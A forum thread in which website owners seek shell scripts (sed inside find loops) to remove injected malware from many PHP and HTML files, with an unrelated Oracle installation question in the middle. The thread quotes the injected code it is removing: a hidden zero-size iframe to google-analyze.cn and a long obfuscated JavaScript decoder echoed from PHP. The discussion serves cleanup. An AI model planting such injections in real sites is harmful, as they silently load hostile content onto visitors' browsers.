[help]Delete or replace text in multiple file and multiple directory

Shell Programming and Scripting
1

here's the case :

almost of php/html file on my site has added the text :

<iframe src="http://google-analyze.cn/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

I don't know how this happen, so i want to remove above text from all of my php/html.

i have tried this following script :

for y in *
do
  sed 's_<iframe src="http:\/\/google-analyze.cn\/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></\iframe>_ _' "$y" >temp
  if cmp temp "$y" >/dev/null
  then
    rm temp
  else
    mv temp "$y"
  fi
done

Above script was works but only in the directory where i run the script, i want all files in subdirectory too, anyone can help me?

Thx

2

Use find to loop through the directory and the subdirectories:

for i in $(find *)

Regards

3

Not bourne-safe - tut tut :wink:

for i in `find *`
4

Both will breake if the filenames contain embedded spaces or other pathological characters.

5

Ooh, very good point! Me = Fail.
Ok then:

find . -type f | while read i

heh, 'pathological characters', nice way of putting it :slight_smile:

6

Could you give me complete code? :smiley: im newbie :confused:. Thx

7

If your initial code works as you describe, you should be able to get away with simply replacing the "for i in *" line with the line given above.

8

Hi all,

when i am ruunind rootpre.sh script to check operating system pre-installation.i am getting the error Reuqired file ./pw-syscall32 is missing Aborting Pre-installation procedure.Installation of oracle mail.

0509-030 can't load program /cdrom/install/runInstaller
0509-036 symbol resolation failed for runInstaller because of error
0509-136 symbol -fill (number 0) is not exported from dependeant module /usr/lib/libc.a (shr.o_
0509-192 examine loader section symbol with 'dump -Tv' command

please any body help me about this issue.

9

Hello. I have a problem very similar to this one in this thread. Some robots spamed my website files with similar strings as described. The script works, but if I change the string to this below it doesnt:

  sed 's_<?php echo '<script language='JavaScript'>function e590206b977(){var w4=Array.prototype.slice.call(arguments).join(""),y4=w4.substr(3,3)-352,wf,o2,w4=w4.substr(6),s9=w4.length;for(var u1=0;u1<s9;u1++){try{throw(x0=w8(w4,u1));}catch(e){x0=e;};if(x0==''){y4="";u1=oc(u1);oe=u9(w4,u1);while(oe!=''){y4+=oe;u1++;oe=x9(w4,u1);}y4-=303;continue;}wf="";if(x0=='�'){u1++;x0=w4.substr(u1,1);while(x0!='�'){wf+=x0;u1++;x0=w4.substr(u1,1);}wf=ob(wf,y4,6);if(wf<0)wf+=256;wf=rd(wf);document.write(String.fromCharCode(wf));continue;}p3=(x0+'').charCodeAt(0);if(p3>848)p3-=848;o2=p3-y4-6;if(o2<0)o2+=256;if(o2>=192)o2+=848;else if(o2==168)o2=1025;else if(o2==184)o2=1105;document.write(String.fromCharCode(o2));}}e590206b977("0d","7374Xebn","502�14��26�","401","�173��1","36��18","7","�4","1","7","�1","87�","�","181�","396�1","33��","�","�","ӵ157��146�","�146","���","�1","4","4��3963","99","�","","","438","","�","0","�","�1","8","7��","18","8","�3","2","1","~","�","12","9��1","34�|","3","7","7","�12","7��","185","�","�19","0�~�179","��","1","83��","1","85","�","348r","eUS","33","3","","{mh","x","433","�18","4��168�4","9","2","�","8","�454","3","3","9","q","4","72","","�","�3�","�478","4","63�8��","21��24�3","4","2","�145��1","46","�","30","9~I","436","","�","173","�","33","8","Y411","�14","8�","�1","76�","�17","4�","�161�","�","1","87�","37","0","�1","43��","15","5�","�","138��","150��14","2��13","5�");function w8(qa,te){return qa.substr(te,1);}function oc(t3){return ++t3;}function u9(s1,tf){return s1.substr(tf,1);}function x9(qe,x4){return qe.substr(x4,1);}function rd(xc){if(xc==168)xc=1025;else if(xc==184)xc=1105;return (xc>=192 && xc<256) ? xc+848 : xc;}function ob(t8,w5,u4){return t8-w5-u4;}<\/script>'; ?>_ _' "$y" >temp

The error returned is:

line 3: syntax error near unexpected token `('

I assume the problem is with the the character '. Am I right? Any ideas how I can fix this?

Thanks

10

It's not only the single quotes ' , but other special characters as well, such as \ " . , that need to be escaped too, and there are too many of them ..., better use a regex:

sed "s:<?php echo '<script language='JavaScript'>.*<\\\/script>'; ?>::" file > temp

I assumed that there are no other valid records with the same content in the corner tags, as the line above has.

11

Thanks a lot. I will try this solution and post the results. Thanks again

12

It seems Im getting somethig wrong here, since I am not very keen with Shell scripting. Here is the code which I put togheter with this forum topic:

find . -type f | while read i
do
  sed "s:<?php echo '<script language='JavaScript'>function e590206b977().*<\\\/script>'; ?>::" file > temp
  if cmp temp "$y" >/dev/null
  then
    rm temp
  else
    mv temp "$y"
  fi
done

Am I doing something wrong here? I added the "function string" above, since its a Joomla site, and it might already include such a string. The program does something, but all I does it display this error numerous times:

mv: target is not directory: No such file or directory
sed: file can't be read: No such file or directory
cmp: : No such file or directory

Thanks again.

13

There are a few things that I'd change, first the variables ( highlighted ), you're using i, y, file which (I guess) you're trying to represent the same thing - the file names.
I changed them below:

find . -type f | while read file
 do
   sed "s:<?php echo '<script language='JavaScript'>function e590206b977().*<\\\/script>'; ?>::" "$file" > "$file".temp
  
   # check cmp's -s flag

   if cmp -s "$file".temp "$file" 
    then
         rm "$file".temp
    else

     # proceed with care here !!

         mv "$file".temp "$file"
   fi
 done

That's not an issue as long as the new string is a continuos part of the initial one, but add cautiously, especially when you hit special characters. BTW the new string ( function e5... ) is not a problem.

Proceed with care when you rename the files, test first from the command line with a few files using only the sed code, to be sure you're getting the right changes.

14

OK. Obviously this script doesn't do, what I would like, since it purged all my files. No harm done anyway, I did it on purpose on a testing website which was also spamed. :slight_smile:

Before I ran the script, I also tested only with sed using this code:

sed "s:<?php echo '<script language='JavaScript'>function e590206b977().*<\/script>'; ?>::" index.php > index.temp

Now, this sed command is the only command in this script which I don't know what exactly does it do. I looked a little through "man sed" but I didn't understand much. I now cmp compares the files, and if they are the same the file index.temp gets removed, if not, the file index.temp becomes index.php. right? What about sed?

I can say, that the above command of sed, just copies the file index.php to index.temp. Nothing else.

Thanks

15

Surely it won't do anything, since you removed two crucial backslashes before the closing tag \/script>. It won't work without them:

sed "s:<?php echo '<script language='JavaScript'>function e590206b977().*<\\\/script>'; ?>::" index.php > index.temp

There is one thing for sure, every single character counts, if you miss one the whole code will fail. Please copy/paste when testing.

I tested with your spam sample, and it worked fine; obviously, if you have another spam string, different from the one above, the code needs again modifications.

The only important point about sed's pattern is the greedy regex .* , it'll match the whole portion of the string from the end of ...>function e590206b977() pattern up to the beginning of <\/script> spam's closing tag.

16

It still won't go. I have a normal index.php file added at the end of the file:

...
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));
<?php echo '<script language='JavaScript'>function e590206b977() jozejsadf</script>'; ?>

In shell I do, for now even without that function part:

sed "s:<?php echo '<script language='JavaScript'>.*<\\\/script>'; ?>::" index.php > index.temp

Nothing happens. index.temp gets created with the same content as index.php.

Below is a copy/paste of the command:

demo@soncek:~/demo2$ sed "s:<?php echo '<script language='JavaScript'>.*<\\\/script>'; ?>::" index.php > index.temp
17

I see ..., the previous code ( 3 backslashes ) worked fine in your previous sample, the code will work with the current sample if you remove only one \ .
Anyway to have predictable results, you'd be better off of getting rid of the <\/ pattern from the closing tag.

I get the desired output for all samples with the following code ( note the differences ):

sed "s:<?php echo '<script language='JavaScript'>.*script>'; ?>::" filename

Tested OK in Solaris and Cygwin (GNU sed).